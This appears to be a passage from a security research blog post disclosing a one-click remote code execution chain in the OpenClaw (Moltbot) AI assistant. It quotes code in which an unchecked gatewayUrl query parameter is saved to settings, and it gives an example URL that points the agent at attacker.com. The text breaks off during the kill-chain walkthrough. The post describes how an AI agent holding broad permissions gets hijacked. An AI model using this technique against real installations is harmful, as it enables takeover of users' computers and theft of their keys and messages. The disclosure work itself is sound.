1-Click RCE to steal your Moltbot data and keys

Summary

Hacking the Hottest Agent in TechOpenClaw (formerly Moltbot and ClawdBot), the open-source AI personal assistant that can take actions on your behalf, is the most popular topic on X right now. It is already trusted by over 100,000 developers to hold the keys to their digital life, from iMessage/WhatsApp/Slack access to unrestricted local computer control. But when you grant an agent "god mode" permissions, the margin for error vanishes. While the community celebrated its capabilities, depthfirst General Security Intelligence silently audited its code and found a critical vulnerability. I investigated the finding, combined it with a vulnerability I discovered, and chained them into a 1-Click Remote Code Execution (RCE) exploit. With this exploit, a single visit to a malicious webpage was enough to hack your computer and AI assistant.I’ll dissect the logic flaw depthfirst uncovered and walk you through the exact kill chain I built to weaponize it.How depthfirst Flagged the VulnerabilityCodebases are rarely linear; logic is scattered, fragmented, and buried across dozens of files. That’s where the complexity and bugs hide.Our system maps the full flow of an application's lifecycle. Here, our engine stitched together a data flow across the stack to reveal a critical logic gap: 1. Ingestion: app-settings.ts blindly accepts a gatewayUrl query parameter in the URL and persists it to storage. For example, https://localhost?gatewayUrl=attacker.com would save attacker.com as the new gateway url.const gatewayUrlRaw = params.get("gatewayUrl"); ... if (gatewayUrlRaw != null) { const gatewayUrl = gatewayUrlRaw.trim(); if (gatewayUrl && gatewayUrl !== host.settings.gatewayUrl) { applySettings(host, { ...host.settings, gatewayUrl }); // persisted via saveSettings -> localStorage } } 2. Processing: app-lifecycle.ts triggers connectGateway() immediately after settings (such as the gateway url) are applied.handleConnected(host) { ... connectGateway(host); // runs immediately on load a...